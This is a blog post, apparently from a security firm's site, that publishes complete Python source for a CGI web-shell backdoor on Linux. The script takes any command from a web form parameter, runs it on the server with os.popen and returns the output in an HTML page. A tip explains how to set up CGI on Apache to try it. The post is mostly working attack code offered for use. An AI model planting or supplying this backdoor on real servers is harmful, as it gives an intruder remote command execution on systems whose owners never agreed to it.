CGI Backdoor for Linux with Python

#!/usr/bin/env python
# Info : Linux based CGI backdoor with python
# author: otoy
# date : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
CGI python backdoor
====================================
Author : otoy
Date : 0x102010
Blog : <a href="http://otoyrood.wordpress.com" target="_blank">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
<head>
<title>CGI python backdoor</title>
</head>
<body>
<pre&>%s</pre>
<form action='%s'>
Command <input type='text' name='cmd' />
<input type='submit' />
</form>
<pre>%s</pre>
</body>
</html>
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.